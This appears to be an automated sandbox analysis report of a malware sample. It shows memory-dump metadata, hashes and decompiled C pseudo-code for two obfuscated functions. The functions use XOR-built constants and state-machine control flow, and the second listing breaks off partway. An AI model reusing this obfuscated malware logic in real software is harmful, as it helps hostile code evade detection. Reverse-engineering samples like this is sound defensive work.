                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: $2$pS?
                                                                                                                                                                                                                    • API String ID: 0-2857336566
                                                                                                                                                                                                                    • Opcode ID: 36f272520303cc8135e85581bfe27420cce9c6cea36cf3e98399de7fbfa15c35
                                                                                                                                                                                                                    • Instruction ID: f37cfe7dbbd52c2ef6f7d0eb16e96099953239458dc6bae58a6c9b7a278157d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36f272520303cc8135e85581bfe27420cce9c6cea36cf3e98399de7fbfa15c35
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83C11EB25083409FD368CF64C58A51BFBF2BBC9758F109A1DF28996260D7B18A49CF47
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                                                                                                    			E00A7C879() {
                                                                                                                                                                                                                    				char _v524;
                                                                                                                                                                                                                    				intOrPtr _v548;
                                                                                                                                                                                                                    				char _v564;
                                                                                                                                                                                                                    				intOrPtr _v568;
                                                                                                                                                                                                                    				intOrPtr _v572;
                                                                                                                                                                                                                    				intOrPtr _v576;
                                                                                                                                                                                                                    				char _v580;
                                                                                                                                                                                                                    				signed int _v584;
                                                                                                                                                                                                                    				signed int _v588;
                                                                                                                                                                                                                    				signed int _v592;
                                                                                                                                                                                                                    				signed int _v596;
                                                                                                                                                                                                                    				signed int _v600;
                                                                                                                                                                                                                    				signed int _v604;
                                                                                                                                                                                                                    				signed int _v608;
                                                                                                                                                                                                                    				signed int _v612;
                                                                                                                                                                                                                    				signed int _v616;
                                                                                                                                                                                                                    				signed int _v620;
                                                                                                                                                                                                                    				signed int _v624;
                                                                                                                                                                                                                    				signed int _v628;
                                                                                                                                                                                                                    				signed int _v632;
                                                                                                                                                                                                                    				signed int _v636;
                                                                                                                                                                                                                    				signed int _v640;
                                                                                                                                                                                                                    				signed int _v644;
                                                                                                                                                                                                                    				signed int _v648;
                                                                                                                                                                                                                    				signed int _v652;
                                                                                                                                                                                                                    				signed int _v656;
                                                                                                                                                                                                                    				signed int _v660;
                                                                                                                                                                                                                    				signed int _v664;
                                                                                                                                                                                                                    				signed int _t227;
                                                                                                                                                                                                                    				void* _t230;
                                                                                                                                                                                                                    				void* _t233;
                                                                                                                                                                                                                    				signed int _t234;
                                                                                                                                                                                                                    				signed int _t235;
                                                                                                                                                                                                                    				signed int _t236;
                                                                                                                                                                                                                    				signed int _t237;
                                                                                                                                                                                                                    				signed int _t253;
                                                                                                                                                                                                                    				intOrPtr _t254;
                                                                                                                                                                                                                    				void* _t256;
                                                                                                                                                                                                                    				void* _t261;
                                                                                                                                                                                                                    				void* _t263;
                                                                                                                                                                                                                    				void* _t271;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v572 = 0x2dfa9b;
                                                                                                                                                                                                                    				_t254 = 0;
                                                                                                                                                                                                                    				_t256 = 0x8fe95fb;
                                                                                                                                                                                                                    				_v568 = 0;
                                                                                                                                                                                                                    				_v612 = 0xd544;
                                                                                                                                                                                                                    				_v612 = _v612 + 0xffff95e3;
                                                                                                                                                                                                                    				_v612 = _v612 + 0xffff0c7b;
                                                                                                                                                                                                                    				_v612 = _v612 ^ 0xffff7722;
                                                                                                                                                                                                                    				_v644 = 0x2c9774;
                                                                                                                                                                                                                    				_v644 = _v644 | 0xeeaa20d5;
                                                                                                                                                                                                                    				_v644 = _v644 >> 0x10;
                                                                                                                                                                                                                    				_v644 = _v644 | 0xef763386;
                                                                                                                                                                                                                    				_v644 = _v644 ^ 0xef76ffaf;
                                                                                                                                                                                                                    				_v600 = 0x7d206b;
                                                                                                                                                                                                                    				_v600 = _v600 << 0xb;
                                                                                                                                                                                                                    				_v600 = _v600 ^ 0xe9035803;
                                                                                                                                                                                                                    				_v616 = 0x13d4d7;
                                                                                                                                                                                                                    				_v616 = _v616 + 0xab20;
                                                                                                                                                                                                                    				_t235 = 0x56;
                                                                                                                                                                                                                    				_v616 = _v616 * 0xd;
                                                                                                                                                                                                                    				_v616 = _v616 ^ 0x01031a59;
                                                                                                                                                                                                                    				_v648 = 0xba9596;
                                                                                                                                                                                                                    				_v648 = _v648 + 0xffff91cf;
                                                                                                                                                                                                                    				_v648 = _v648 / _t235;
                                                                                                                                                                                                                    				_v648 = _v648 >> 1;
                                                                                                                                                                                                                    				_v648 = _v648 ^ 0x00044a00;
                                                                                                                                                                                                                    				_v624 = 0x19dd2b;
                                                                                                                                                                                                                    				_t236 = 0x45;
                                                                                                                                                                                                                    				_v624 = _v624 * 0x72;
                                                                                                                                                                                                                    				_v624 = _v624 >> 8;
                                                                                                                                                                                                                    				_v624 = _v624 * 0xd;
                                                                                                                                                                                                                    				_v624 = _v624 ^ 0x0098800d;
                                                                                                                                                                                                                    				_v656 = 0x22b33f;
                                                                                                                                                                                                                    				_v656 = _v656 ^ 0xba862660;
                                                                                                                                                                                                                    				_v656 = _v656 << 8;
                                                                                                                                                                                                                    				_v656 = _v656 >> 0xb;
                                                                                                                                                                                                                    				_v656 = _v656 ^ 0x00154a5e;
                                                                                                                                                                                                                    				_v608 = 0x95b376;
                                                                                                                                                                                                                    				_v608 = _v608 / _t236;
                                                                                                                                                                                                                    				_v608 = _v608 ^ 0x0003d1e8;
                                                                                                                                                                                                                    				_v620 = 0x11a61;
                                                                                                                                                                                                                    				_v620 = _v620 | 0xbf7368df;
                                                                                                                                                                                                                    				_v620 = _v620 << 2;
                                                                                                                                                                                                                    				_v620 = _v620 + 0x5da5;
                                                                                                                                                                                                                    				_v620 = _v620 ^ 0xfdc575f6;
                                                                                                                                                                                                                    				_v628 = 0xc443e4;
                                                                                                                                                                                                                    				_v628 = _v628 + 0xf184;
                                                                                                                                                                                                                    				_v628 = _v628 << 9;
                                                                                                                                                                                                                    				_v628 = _v628 ^ 0x6ed35c58;
                                                                                                                                                                                                                    				_v628 = _v628 ^ 0xe4b76e03;
                                                                                                                                                                                                                    				_v636 = 0x46bf42;
                                                                                                                                                                                                                    				_v636 = _v636 | 0x10899843;
                                                                                                                                                                                                                    				_t237 = 0x37;
                                                                                                                                                                                                                    				_v636 = _v636 / _t237;
                                                                                                                                                                                                                    				_v636 = _v636 * 0x28;
                                                                                                                                                                                                                    				_v636 = _v636 ^ 0x0c35b579;
                                                                                                                                                                                                                    				_v592 = 0xc9f510;
                                                                                                                                                                                                                    				_v592 = _v592 + 0xffff158c;
                                                                                                                                                                                                                    				_v592 = _v592 ^ 0x00ce8f51;
                                                                                                                                                                                                                    				_v660 = 0x143030;
                                                                                                                                                                                                                    				_v660 = _v660 | 0xbeb1ca1f;
                                                                                                                                                                                                                    				_v660 = _v660 + 0xd446;
                                                                                                                                                                                                                    				_v660 = _v660 ^ 0x1b467e74;
                                                                                                                                                                                                                    				_v660 = _v660 ^ 0xa5f036c6;
                                                                                                                                                                                                                    				_v664 = 0xcc4015;
                                                                                                                                                                                                                    				_v664 = _v664 | 0x30a0a874;
                                                                                                                                                                                                                    				_v664 = _v664 + 0x71;
                                                                                                                                                                                                                    				_v664 = _v664 >> 0xd;
                                                                                                                                                                                                                    				_v664 = _v664 ^ 0x0003a42c;
                                                                                                                                                                                                                    				_v584 = 0x67f4df;
                                                                                                                                                                                                                    				_t238 = 9;
                                                                                                                                                                                                                    				_t234 = _v600;
                                                                                                                                                                                                                    				_v584 = _v584 * 0x31;
                                                                                                                                                                                                                    				_v584 = _v584 ^ 0x13e2e6ff;
                                                                                                                                                                                                                    				_v632 = 0x9f1e38;
                                                                                                                                                                                                                    				_v632 = _v632 + 0xd257;
                                                                                                                                                                                                                    				_v632 = _v632 >> 0xe;
                                                                                                                                                                                                                    				_v632 = _v632 >> 0xa;
                                                                                                                                                                                                                    				_v632 = _v632 ^ 0x0005ada5;
                                                                                                                                                                                                                    				_v604 = 0x771d8;
                                                                                                                                                                                                                    				_v604 = _v604 / _t238;
                                                                                                                                                                                                                    				_v604 = _v604 + 0x3d14;
                                                                                                                                                                                                                    				_v604 = _v604 ^ 0x00069173;
                                                                                                                                                                                                                    				_v652 = 0xdb7513;
                                                                                                                                                                                                                    				_v652 = _v652 ^ 0x18a847ec;
                                                                                                                                                                                                                    				_v652 = _v652 ^ 0xe00e1966;
                                                                                                                                                                                                                    				_v652 = _v652 | 0x28a9731a;
                                                                                                                                                                                                                    				_v652 = _v652 ^ 0xf8febe24;
                                                                                                                                                                                                                    				_v596 = 0x68cc05;
                                                                                                                                                                                                                    				_v596 = _v596 ^ 0x694ebefd;
                                                                                                                                                                                                                    				_v596 = _v596 ^ 0x6926bc57;
                                                                                                                                                                                                                    				_v588 = 0x3028d5;
                                                                                                                                                                                                                    				_v588 = _v588 << 0xa;
                                                                                                                                                                                                                    				_v588 = _v588 ^ 0xc0af576b;
                                                                                                                                                                                                                    				_v640 = 0x220c6d;
                                                                                                                                                                                                                    				_v640 = _v640 ^ 0x86687000;
                                                                                                                                                                                                                    				_v640 = _v640 * 0x3c;
                                                                                                                                                                                                                    				_v640 = _v640 << 6;
                                                                                                                                                                                                                    				_v640 = _v640 ^ 0x5d4e36ff;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t256 != 0x1b1bc44) {
                                                                                                                                                                                                                    						if(_t256 == 0x8bdeb40) {
                                                                                                                                                                                                                    							_t227 = E00A6D777(_v660, _v664, _t238, _v584, _t238, _v632,  &_v564, _t234);
                                                                                                                                                                                                                    							_t238 = _t234;
                                                                                                                                                                                                                    							asm("sbb esi, esi");
                                                                                                                                                                                                                    							_t256 = ( ~_t227 & 0x0b7b0f1a) + 0x4444;
                                                                                                                                                                                                                    							E00A6E2BD(_t234, _v604, _v652, _v596);
                                                                                                                                                                                                                    							_t263 = _t263 + 0x20;
                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t256 == 0x8fe95fb) {
                                                                                                                                                                                                                    							_t256 = 0xb6aaa38;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t256 == 0xb6aaa38) {
                                                                                                                                                                                                                    							_t253 = _v648;
                                                                                                                                                                                                                    							_t238 = _v616;
                                                                                                                                                                                                                    							_t230 = E00A6D804(_v616, _t253,  &_v524, _v616, _v624, _v656);
                                                                                                                                                                                                                    							_t263 = _t263 + 0x10;
                                                                                                                                                                                                                    							if(_t230 == 0) {
                                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                                    								return _t254;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							_t256 = 0x1b1bc44;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t256 == 0xb7b535e) {
                                                                                                                                                                                                                    							_t253 =  &_v580;
                                                                                                                                                                                                                    							E00A710CB(_v588, _t253, _v640);
                                                                                                                                                                                                                    							_pop(_t238);
                                                                                                                                                                                                                    							_t256 = 0xed4bd39;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t256 != 0xed4bd39) {
                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t233 = E00A7B0DD(_t238);
                                                                                                                                                                                                                    						_t261 = _v580 - _v548;
                                                                                                                                                                                                                    						asm("sbb ecx, [esp+0x8c]");
                                                                                                                                                                                                                    						_t271 = _v576 - _t253;
                                                                                                                                                                                                                    						if(_t271 >= 0 && (_t271 > 0 || _t261 >= _t233)) {
                                                                                                                                                                                                                    							_t254 = 1;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t234 = E00A7A3E9(_v608, _v600, _v608,  &_v524, _v608, _v620, _v628, _t254, _v636, _v592, _v644, _v612);
                                                                                                                                                                                                                    					_t263 = _t263 + 0x28;
                                                                                                                                                                                                                    					if(_t234 == 0xffffffff) {
                                                                                                                                                                                                                    						_t256 = 0x4444;
                                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t256 = 0x8bdeb40;
                                                                                                                                                                                                                    					continue;
                                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                                    				} while (_t256 != 0x4444);
                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                    			}












































                                                                                                                                                                                                                    0x00a7c87f
                                                                                                                                                                                                                    0x00a7c88d
                                                                                                                                                                                                                    0x00a7c88f
                                                                                                                                                                                                                    0x00a7c894
                                                                                                                                                                                                                    0x00a7c898
                                                                                                                                                                                                                    0x00a7c8a0
                                                                                                                                                                                                                    0x00a7c8a8
                                                                                                                                                                                                                    0x00a7c8b0
                                                                                                                                                                                                                    0x00a7c8b8
                                                                                                                                                                                                                    0x00a7c8c0
                                                                                                                                                                                                                    0x00a7c8c8
                                                                                                                                                                                                                    0x00a7c8cd
                                                                                                                                                                                                                    0x00a7c8d5
                                                                                                                                                                                                                    0x00a7c8dd
                                                                                                                                                                                                                    0x00a7c8e5
                                                                                                                                                                                                                    0x00a7c8ea
                                                                                                                                                                                                                    0x00a7c8f2
                                                                                                                                                                                                                    0x00a7c8fa
                                                                                                                                                                                                                    0x00a7c909
                                                                                                                                                                                                                    0x00a7c90c
                                                                                                                                                                                                                    0x00a7c910
                                                                                                                                                                                                                    0x00a7c918
                                                                                                                                                                                                                    0x00a7c920
                                                                                                                                                                                                                    0x00a7c930
                                                                                                                                                                                                                    0x00a7c934
                                                                                                                                                                                                                    0x00a7c938
                                                                                                                                                                                                                    0x00a7c940
                                                                                                                                                                                                                    0x00a7c94d
                                                                                                                                                                                                                    0x00a7c950
                                                                                                                                                                                                                    0x00a7c954
                                                                                                                                                                                                                    0x00a7c95e
                                                                                                                                                                                                                    0x00a7c962
                                                                                                                                                                                                                    0x00a7c96a
                                                                                                                                                                                                                    0x00a7c972
                                                                                                                                                                                                                    0x00a7c97a
                                                                                                                                                                                                                    0x00a7c97f
                                                                                                                                                                                                                    0x00a7c984
                                                                                                                                                                                                                    0x00a7c98c
                                                                                                                                                                                                                    0x00a7c9a4
                                                                                                                                                                                                                    0x00a7c9a8
                                                                                                                                                                                                                    0x00a7c9b0
                                                                                                                                                                                                                    0x00a7c9b8
                                                                                                                                                                                                                    0x00a7c9c0
                                                                                                                                                                                                                    0x00a7c9c5
                                                                                                                                                                                                                    0x00a7c9cd
                                                                                                                                                                                                                    0x00a7c9d5
                                                                                                                                                                                                                    0x00a7c9dd
                                                                                                                                                                                                                    0x00a7c9e5
                                                                                                                                                                                                                    0x00a7c9ea
                                                                                                                                                                                                                    0x00a7c9f2
                                                                                                                                                                                                                    0x00a7c9fa
                                                                                                                                                                                                                    0x00a7ca02
                                                                                                                                                                                                                    0x00a7ca0e
                                                                                                                                                                                                                    0x00a7ca11
                                                                                                                                                                                                                    0x00a7ca1a
                                                                                                                                                                                                                    0x00a7ca1e
                                                                                                                                                                                                                    0x00a7ca26
                                                                                                                                                                                                                    0x00a7ca2e
                                                                                                                                                                                                                    0x00a7ca36
                                                                                                                                                                                                                    0x00a7ca3e
                                                                                                                                                                                                                    0x00a7ca48
                                                                                                                                                                                                                    0x00a7ca55
                                                                                                                                                                                                                    0x00a7ca5d
                                                                                                                                                                                                                    0x00a7ca65
                                                                                                                                                                                                                    0x00a7ca6d
                                                                                                                                                                                                                    0x00a7ca75
                                                                                                                                                                                                                    0x00a7ca7d
                                                                                                                                                                                                                    0x00a7ca82
                                                                                                                                                                                                                    0x00a7ca87
                                                                                                                                                                                                                    0x00a7ca8f
                                                                                                                                                                                                                    0x00a7ca9e
                                                                                                                                                                                                                    0x00a7ca9f
                                                                                                                                                                                                                    0x00a7caa3
                                                                                                                                                                                                                    0x00a7caa7
                                                                                                                                                                                                                    0x00a7caaf
                                                                                                                                                                                                                    0x00a7cab7
                                                                                                                                                                                                                    0x00a7cabf
                                                                                                                                                                                                                    0x00a7cac4
                                                                                                                                                                                                                    0x00a7cac9
                                                                                                                                                                                                                    0x00a7cad1
                                                                                                                                                                                                                    0x00a7cadf
                                                                                                                                                                                                                    0x00a7cae3
                                                                                                                                                                                                                    0x00a7caeb
                                                                                                                                                                                                                    0x00a7caf3
                                                                                                                                                                                                                    0x00a7cafb
                                                                                                                                                                                                                    0x00a7cb03
                                                                                                                                                                                                                    0x00a7cb0b
                                                                                                                                                                                                                    0x00a7cb13
                                                                                                                                                                                                                    0x00a7cb1b
                                                                                                                                                                                                                    0x00a7cb23
                                                                                                                                                                                                                    0x00a7cb2b
                                                                                                                                                                                                                    0x00a7cb33
                                                                                                                                                                                                                    0x00a7cb3b
                                                                                                                                                                                                                    0x00a7cb40
                                                                                                                                                                                                                    0x00a7cb48
                                                                                                                                                                                                                    0x00a7cb50
                                                                                                                                                                                                                    0x00a7cb5d
                                                                                                                                                                                                                    0x00a7cb61
                                                                                                                                                                                                                    0x00a7cb66
                                                                                                                                                                                                                    0x00a7cb6e
                                                                                                                                                                                                                    0x00a7cb6e
                                                                                                                                                                                                                    0x00a7cb80
                                                                                                                                                                                                                    0x00a7cc50
                                                                                                                                                                                                                    0x00a7cc5b
                                                                                                                                                                                                                    0x00a7cc67
                                                                                                                                                                                                                    0x00a7cc6f
                                                                                                                                                                                                                    0x00a7cc71
                                                                                                                                                                                                                    0x00a7cc76
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7cc76
                                                                                                                                                                                                                    0x00a7cb8c
                                                                                                                                                                                                                    0x00a7cc2e
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7cc2e
                                                                                                                                                                                                                    0x00a7cb98
                                                                                                                                                                                                                    0x00a7cc0e
                                                                                                                                                                                                                    0x00a7cc13
                                                                                                                                                                                                                    0x00a7cc18
                                                                                                                                                                                                                    0x00a7cc1d
                                                                                                                                                                                                                    0x00a7cc22
                                                                                                                                                                                                                    0x00a7cbd6
                                                                                                                                                                                                                    0x00a7cbe2
                                                                                                                                                                                                                    0x00a7cbe2
                                                                                                                                                                                                                    0x00a7cc24
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7cc24
                                                                                                                                                                                                                    0x00a7cba0
                                                                                                                                                                                                                    0x00a7cbeb
                                                                                                                                                                                                                    0x00a7cbef
                                                                                                                                                                                                                    0x00a7cbf4
                                                                                                                                                                                                                    0x00a7cbf5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7cbf5
                                                                                                                                                                                                                    0x00a7cba8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7cbae
                                                                                                                                                                                                                    0x00a7cbb7
                                                                                                                                                                                                                    0x00a7cbc2
                                                                                                                                                                                                                    0x00a7cbc9
                                                                                                                                                                                                                    0x00a7cbcb
                                                                                                                                                                                                                    0x00a7cbd5
                                                                                                                                                                                                                    0x00a7cbd5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7cbcb
                                                                                                                                                                                                                    0x00a7ccab
                                                                                                                                                                                                                    0x00a7ccad
                                                                                                                                                                                                                    0x00a7ccb3
                                                                                                                                                                                                                    0x00a7ccbf
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7ccbf
                                                                                                                                                                                                                    0x00a7ccb5
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7ccc1
                                                                                                                                                                                                                    0x00a7ccc1
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: k }$q
                                                                                                                                                                                                                    • API String ID: 0-36783472
                                                                                                                                                                                                                    • Opcode ID: 6ba73c8adf3917ab85bfa73dd5d6a7d3f5162765bcfdc0267d64763575229ec7
                                                                                                                                                                                                                    • Instruction ID: 010964d668b4bf641ad42cb9977e69f61b7226d92813aaffece9fda54ba0203b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ba73c8adf3917ab85bfa73dd5d6a7d3f5162765bcfdc0267d64763575229ec7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDB131729083809FC368CF65D98A50BFBF1BBC4768F108A1DF59A96260D3B58949CF47
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                    			E00A76DA4() {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				signed int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				signed int _v52;
                                                                                                                                                                                                                    				signed int _v56;
                                                                                                                                                                                                                    				signed int _v60;
                                                                                                                                                                                                                    				signed int _v64;
                                                                                                                                                                                                                    				signed int _v68;
                                                                                                                                                                                                                    				signed int _v72;
                                                                                                                                                                                                                    				signed int _v76;
                                                                                                                                                                                                                    				signed int _v80;
                                                                                                                                                                                                                    				short _t199;
                                                                                                                                                                                                                    				short _t201;
                                                                                                                                                                                                                    				void* _t210;
                                                                                                                                                                                                                    				void* _t211;
                                                                                                                                                                                                                    				void* _t214;
                                                                                                                                                                                                                    				void* _t236;
                                                                                                                                                                                                                    				short* _t237;
                                                                                                                                                                                                                    				void* _t238;
                                                                                                                                                                                                                    				short* _t239;
                                                                                                                                                                                                                    				signed int _t240;
                                                                                                                                                                                                                    				signed int _t241;
                                                                                                                                                                                                                    				signed int _t242;
                                                                                                                                                                                                                    				signed int _t243;
                                                                                                                                                                                                                    				signed int _t244;
                                                                                                                                                                                                                    				signed int _t245;
                                                                                                                                                                                                                    				signed int _t246;
                                                                                                                                                                                                                    				signed int _t247;
                                                                                                                                                                                                                    				signed int _t248;
                                                                                                                                                                                                                    				void* _t249;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_v64 = 0x7b218a;
                                                                                                                                                                                                                    				_t236 =  *0xa83b38 + 0xc;
                                                                                                                                                                                                                    				_v64 = _v64 << 0xe;
                                                                                                                                                                                                                    				_t210 = 0x329bd01;
                                                                                                                                                                                                                    				_v64 = _v64 ^ 0xc86df94a;
                                                                                                                                                                                                                    				_v48 = 0x5ad4dc;
                                                                                                                                                                                                                    				_t240 = 0x2a;
                                                                                                                                                                                                                    				_v48 = _v48 / _t240;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x000e0b0b;
                                                                                                                                                                                                                    				_v12 = 0xf222af;
                                                                                                                                                                                                                    				_v12 = _v12 << 9;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0bc446ce;
                                                                                                                                                                                                                    				_t241 = 0x12;
                                                                                                                                                                                                                    				_v12 = _v12 / _t241;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0d40098c;
                                                                                                                                                                                                                    				_v8 = 0x3765d5;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0xdea0e124;
                                                                                                                                                                                                                    				_v8 = _v8 >> 8;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x3c8b6dd5;
                                                                                                                                                                                                                    				_v8 = _v8 ^ 0x3c567e44;
                                                                                                                                                                                                                    				_v16 = 0x6bfaa9;
                                                                                                                                                                                                                    				_v16 = _v16 + 0xffff8cea;
                                                                                                                                                                                                                    				_v16 = _v16 << 8;
                                                                                                                                                                                                                    				_v16 = _v16 | 0x088199f8;
                                                                                                                                                                                                                    				_v16 = _v16 ^ 0x6b8f559f;
                                                                                                                                                                                                                    				_v28 = 0x53f64e;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xbbd28483;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0xe734142c;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x5cb30813;
                                                                                                                                                                                                                    				_v52 = 0x2403d4;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x0e643356;
                                                                                                                                                                                                                    				_v52 = _v52 ^ 0x0e4ed937;
                                                                                                                                                                                                                    				_v60 = 0xe83223;
                                                                                                                                                                                                                    				_v60 = _v60 + 0x3a0e;
                                                                                                                                                                                                                    				_v60 = _v60 ^ 0x00e1c916;
                                                                                                                                                                                                                    				_v56 = 0x7a859;
                                                                                                                                                                                                                    				_v56 = _v56 + 0x9283;
                                                                                                                                                                                                                    				_v56 = _v56 ^ 0x0009fdec;
                                                                                                                                                                                                                    				_v20 = 0xd943f5;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffff31ec;
                                                                                                                                                                                                                    				_v20 = _v20 << 0xa;
                                                                                                                                                                                                                    				_v20 = _v20 + 0xffff7939;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x61d877e4;
                                                                                                                                                                                                                    				_v72 = 0xf75845;
                                                                                                                                                                                                                    				_t242 = 0x1b;
                                                                                                                                                                                                                    				_v72 = _v72 * 0x15;
                                                                                                                                                                                                                    				_v72 = _v72 ^ 0x144f655b;
                                                                                                                                                                                                                    				_v24 = 0xba6492;
                                                                                                                                                                                                                    				_v24 = _v24 / _t242;
                                                                                                                                                                                                                    				_t243 = 0x1d;
                                                                                                                                                                                                                    				_v24 = _v24 * 0x46;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x76a9f438;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x7745abbd;
                                                                                                                                                                                                                    				_v68 = 0x799300;
                                                                                                                                                                                                                    				_v68 = _v68 / _t243;
                                                                                                                                                                                                                    				_v68 = _v68 ^ 0x000496b1;
                                                                                                                                                                                                                    				_v36 = 0xacc6a;
                                                                                                                                                                                                                    				_v36 = _v36 | 0x84d6b7fc;
                                                                                                                                                                                                                    				_v36 = _v36 + 0xffff760b;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x84d383df;
                                                                                                                                                                                                                    				_v76 = 0xb40402;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x341081de;
                                                                                                                                                                                                                    				_v76 = _v76 ^ 0x34aedb20;
                                                                                                                                                                                                                    				_v32 = 0x541803;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x66d4c3f7;
                                                                                                                                                                                                                    				_v32 = _v32 >> 0xa;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0019386b;
                                                                                                                                                                                                                    				_v80 = 0xcdc91;
                                                                                                                                                                                                                    				_t244 = 0x25;
                                                                                                                                                                                                                    				_v80 = _v80 / _t244;
                                                                                                                                                                                                                    				_v80 = _v80 ^ 0x00023e70;
                                                                                                                                                                                                                    				_v44 = 0xe1fa8d;
                                                                                                                                                                                                                    				_t245 = 0x14;
                                                                                                                                                                                                                    				_v44 = _v44 / _t245;
                                                                                                                                                                                                                    				_t246 = 0x6a;
                                                                                                                                                                                                                    				_v44 = _v44 / _t246;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x000918c8;
                                                                                                                                                                                                                    				_v40 = 0xb68515;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x9d02ddbb;
                                                                                                                                                                                                                    				_v40 = _v40 | 0xbc98bb57;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0xbdb27580;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t210 != 0x1688339) {
                                                                                                                                                                                                                    						if(_t210 == 0x329bd01) {
                                                                                                                                                                                                                    							_t201 = E00A773DE();
                                                                                                                                                                                                                    							_t210 = 0xf1ab01f;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t210 == 0xe77fd06) {
                                                                                                                                                                                                                    							E00A7CD47(_v80, _t236, 3, _v44, 1, _v40);
                                                                                                                                                                                                                    							 *((short*)(_t236 + 6)) = 0;
                                                                                                                                                                                                                    							return 0;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						if(_t210 != 0xf1ab01f) {
                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_push(_t210);
                                                                                                                                                                                                                    						_push(_t210);
                                                                                                                                                                                                                    						_push(4);
                                                                                                                                                                                                                    						_t214 = 0x10;
                                                                                                                                                                                                                    						_t248 = E00A75103(_t214);
                                                                                                                                                                                                                    						E00A7CD47(_v16, _t236, 1, _v28, 2, _v52);
                                                                                                                                                                                                                    						_t238 = _t236 + 2;
                                                                                                                                                                                                                    						E00A7CD47(_v60, _t238, _t248, _v56, 1, _v20);
                                                                                                                                                                                                                    						_t249 = _t249 + 0x2c;
                                                                                                                                                                                                                    						_t239 = _t238 + _t248 * 2;
                                                                                                                                                                                                                    						_t210 = 0x1688339;
                                                                                                                                                                                                                    						_t201 = 0x5c;
                                                                                                                                                                                                                    						 *_t239 = _t201;
                                                                                                                                                                                                                    						_t236 = _t239 + 2;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_push(_t210);
                                                                                                                                                                                                                    					_push(_t210);
                                                                                                                                                                                                                    					_push(4);
                                                                                                                                                                                                                    					_t211 = 0x10;
